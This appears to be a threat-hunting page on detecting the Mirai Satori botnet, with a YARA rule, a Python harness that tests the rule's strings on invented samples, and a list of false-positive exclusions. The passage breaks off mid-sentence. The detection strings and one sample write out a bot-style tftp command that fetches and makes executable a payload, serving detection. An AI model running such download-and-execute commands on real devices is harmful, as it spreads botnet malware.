Adversaries may use Mirai Satori_gen to scan for vulnerable IoT devices, leveraging weak credentials to establish initial access. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential botnet activity before it leads to larger-scale attacks.
YARA Rule
rule is__Mirai_Satori_gen {
    meta:
        description = "Detects Mirai Satori_gen"
        reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/"
        date = "2018-01-05"
    strings:
        $st08 = "tftp -r satori" fullword nocase wide ascii
        $st09 = "/bins/satori" fullword nocase wide ascii
        $st10 = "satori" fullword nocase wide ascii
        $st11 = "SATORI" fullword nocase wide ascii
    condition:
        2 of them
}
This rule contains 4 string patterns in its detection logic.
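To see what the condition "2 of them" actually requires, the following added example (written for this page, not code from the rule author or from the YARA project) re-implements the four string patterns with Python regular expressions that approximate YARA's fullword, nocase, ascii and wide modifiers, then evaluates the condition against a handful of constructed byte samples. The sample contents, the hostnames and the 192.0.2.x addresses are invented for illustration; the string identifiers and literals are the ones from the rule.

```python
import re
from typing import Dict, List

# The four strings from the rule above; every one carries
# "fullword nocase wide ascii".
SATORI_STRINGS = {
    "$st08": "tftp -r satori",
    "$st09": "/bins/satori",
    "$st10": "satori",
    "$st11": "SATORI",
}
MIN_MATCHES = 2  # the rule condition: "2 of them"


def _ascii_pattern(text):
    """fullword ascii: literal must not be bordered by an alphanumeric byte.
    nocase is approximated with re.IGNORECASE (ASCII letters only)."""
    literal = re.escape(text.encode("ascii"))
    return re.compile(rb"(?<![A-Za-z0-9])" + literal + rb"(?![A-Za-z0-9])",
                      re.IGNORECASE)


def _wide_pattern(text):
    """fullword wide: the literal as UTF-16LE, not bordered by an
    alphanumeric wide character (approximation of YARA's wide fullword check)."""
    literal = re.escape(text.encode("utf-16-le"))
    return re.compile(rb"(?<![A-Za-z0-9]\x00)" + literal + rb"(?![A-Za-z0-9]\x00)",
                      re.IGNORECASE)


# Compile each rule string once in both encodings.
COMPILED = {name: (_ascii_pattern(s), _wide_pattern(s))
            for name, s in SATORI_STRINGS.items()}


def matched_strings(data: bytes) -> List[str]:
    """Identifiers of the rule strings present in data, in rule order."""
    return [name for name, (ascii_re, wide_re) in COMPILED.items()
            if ascii_re.search(data) or wide_re.search(data)]


def rule_fires(data: bytes) -> bool:
    """Evaluate the rule condition '2 of them'."""
    return len(matched_strings(data)) >= MIN_MATCHES


# Constructed samples (not real captures): two bot-style command fragments,
# a bare occurrence of the word, a substring that fullword must reject,
# a UTF-16LE (wide) occurrence, and a benign rsync command line.
SAMPLES: Dict[str, bytes] = {
    "download_cmd": b"/bin/busybox tftp -r satori -g 192.0.2.10; chmod +x satori",
    "http_fetch": b"GET /bins/satori HTTP/1.0\r\nHost: 192.0.2.10\r\n",
    "bare_word": b"found file satori in /tmp",
    "substring_only": b"satorical",
    "wide_word": "launch SATORI now".encode("utf-16-le"),
    "benign": b"rsync --backup --backup-dir=/backup /var/lib /mnt/backup",
}


def scan_all(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run the rule over every sample; maps sample name to matched strings."""
    return {name: matched_strings(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        verdict = "MATCH" if len(hits) >= MIN_MATCHES else "no match"
        print(f"{name:15s} {verdict:9s} {hits}")
```

The "bare_word" sample is the one worth noticing: because $st10 and $st11 are the same literal once nocase applies, any standalone occurrence of the word "satori" satisfies both and therefore satisfies "2 of them" on its own. A team tuning this rule for hunting can use the same harness to check a tightened condition (for example requiring $st08 or $st09 in addition) against the same samples before deploying it.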
Scenario: Scheduled System Backup Using rsync
Description: A legitimate scheduled backup task using rsync may generate traffic patterns similar to Mirai botnet activity, especially when transferring large volumes of data.
Filter/Exclusion: Exclude traffic originating from known backup servers or processes using rsync with specific command-line arguments (e.g., rsync --backup --backup-dir=/backup).
Scenario: Admin Task Using nc for Network Diagnostics
Description: System administrators may use nc (netcat) for network testing or port scanning as part of routine diagnostics or troubleshooting.
Filter/Exclusion: Exclude connections initiated from admin workstations or users with elevated privileges, or filter by known admin IP ranges and user agents.
Scenario: Cron Job for Log Rotation
Description: A cron job that rotates logs using tools like logrotate may generate a high volume of small TCP connections, which could be mistaken for Mirai botnet traffic.
Filter/Exclusion: Exclude traffic from processes associated with logrotate or from specific cron job directories (e.g., /etc/cron.daily/).
Scenario: Remote Desktop Protocol (RDP) Session
Description: A legitimate RDP session may involve multiple connection attempts or keep-alive packets that resemble botnet communication patterns.
Filter/Exclusion: Exclude traffic from known RDP clients or IP addresses associated with internal user access, or filter based on the presence of RDP-specific headers or payloads.
Scenario: Database Replication Using mysqldump
Description: Database replication tasks using mysqldump can generate high-frequency connection attempts and data transfers that may trigger the Mirai Satori_gen rule.
Filter/Exclusion: Exclude traffic from database replication servers or processes using `mysq